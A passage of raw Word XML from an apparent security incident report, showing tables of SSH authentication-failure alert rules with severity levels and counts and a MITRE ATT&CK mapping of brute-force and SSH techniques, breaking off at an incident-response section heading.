          <w:p w14:paraId="33ED344E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584" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7B1A1A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DFC7119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w="1440" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7B1A1A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="488BA0FA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Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="40887219" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DE5C263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40111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="525F2BD3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Multiple authentication failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28213205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Level 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C88A0AB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~150+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="13941B86" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF5F5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D8E08D7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5758</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF5F5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CF5FF30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Maximum authentication attempts exceeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF5F5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="644BC188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Level 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF5F5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="494C6A3A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~80+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="4C29FB9E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33F09F19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2502</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31145D7F" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>User</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> missed the password more than once</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75539BB0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Level 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2388A4E0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~60+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="1499BF93" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF5F5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01A6B8DD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2501</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF5F5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="740EAF4E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User authentication failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF5F5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="726825F1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Level 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF5F5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2084756E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~40+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="4A0757CB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1152" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6957303C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5760</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4608" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50E252B9" w14:textId="77777777" w:rsidR="00BA2BC0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8"/>
              </w:rPr>
              <w:t>sshd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: authentication failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="158C76C0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Level 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="F0D0D0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="E0B0B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48B45AAC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~30+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="740A26FC" w14:textId="74318D4E" w:rsidR="007F7D8E" w:rsidRPr="007F7D8E" w:rsidRDefault="007F7D8E" w:rsidP="007F7D8E">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="447" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="295"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007F7D8E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="505BFD1D" wp14:editId="2BBFB28D">
            <wp:extent cx="6248400" cy="3451860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="213760890" name="صورة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955C0" w14:textId="7CDDCE75" w:rsidR="007F7D8E" w:rsidRPr="007F7D8E" w:rsidRDefault="000E505A" w:rsidP="007F7D8E">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="447" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="295"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007F7D8E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6446545D" wp14:editId="33955501">
            <wp:extent cx="6248400" cy="3349625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="381055498" name="صورة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505A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="315935A8" wp14:editId="5C6F15BA">
            <wp:extent cx="6248400" cy="3279140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="175116347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63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E263" w14:textId="02EAC542" w:rsidR="00BA2BC0" w:rsidRDefault="000E505A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="447" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="295"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000E505A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="039E29CE" wp14:editId="640FF797">
            <wp:extent cx="6248400" cy="3177540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="137499700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97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8E06" w14:textId="426AD3E8" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 MITRE ATT&amp;CK; Mapping</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="6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28"/>
        <w:gridCol w:w="4032"/>
        <w:gridCol w:w="3960"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="0AE9DAC1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2C5282"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="222B5366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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B0C4DE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2C5282"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="732B3403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3960" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2C5282"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B774DA0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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="20A6D13F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4879D99B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2C5282"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="059DF1B1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Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="396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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="174DD9BC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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="3DA93E91" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AB63075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2C5282"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1110.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032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0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A6DD8C9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Password Guessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="396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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63228084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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="1C24A020" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20D208C2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2C5282"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1021.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34A6CA47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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="396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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DAACA6D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Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="4D244FA9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="441FAE16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2C5282"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E666041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Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0887646D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Defense Evasion / Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0510EABA" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 Incident Response Actions</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="6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7128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="0DE0593D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A4A2A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75099D5C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7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
